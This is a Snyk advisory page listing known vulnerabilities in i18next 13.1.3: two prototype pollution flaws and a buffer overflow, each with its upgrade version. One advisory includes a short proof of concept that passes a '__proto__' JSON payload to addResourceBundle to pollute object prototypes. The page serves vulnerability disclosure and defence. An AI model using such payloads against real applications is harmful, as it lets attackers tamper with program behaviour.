Homepage

i18next@13.1.3 vulnerabilities

i18next internationalization framework

  • latest version

    25.6.0

  • latest non vulnerable version

    25.6.0

  • first published

    13 years ago

  • latest version published

    10 days ago

  • licenses detected

  • View i18next package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the i18next package. This does not include vulnerabilities belonging to this package’s dependencies.

    Fix vulnerabilities automatically

    Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Prototype Pollution via getLastOfPath() in i18next.js.

    How to fix Prototype Pollution?

    Upgrade i18next to version 19.8.5 or higher.

    <19.8.5
    • M
    Prototype Pollution

    i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the AddResourceBundle API which uses the the deepExtend function (https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370) internally to extend existing translations in a file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

    PoC

    import i18n from "i18next";
i18n.init({
    resources: {
      en: {
        namespace1: {
          key: 'hello from namespace 1'
        },
        namespace2: {
          key: 'hello from namespace 2'
        }
      },
      de: {
        namespace1: {
          key: 'hallo von namespace 1'
        },
        namespace2: {
          key: 'hallo von namespace 2'
        }  
      }
    }
  });

  var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
  i18n.init({ resources: {} });
  i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload)
  ,true,true);
 
 
console.log(i18n.options.resources);
//a newly created empty object has the vulnerable property
console.log({}.vulnerable);

    How to fix Prototype Pollution?

    Upgrade i18next to version 19.8.3 or higher.

    <19.8.3
    • M
    Buffer Overflow

    i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause buffer overflow by changing the translation to be recursive.

    How to fix Buffer Overflow?

    Upgrade i18next to version 19.5.5 or higher.

    <19.5.5
    Go back to all versions of this package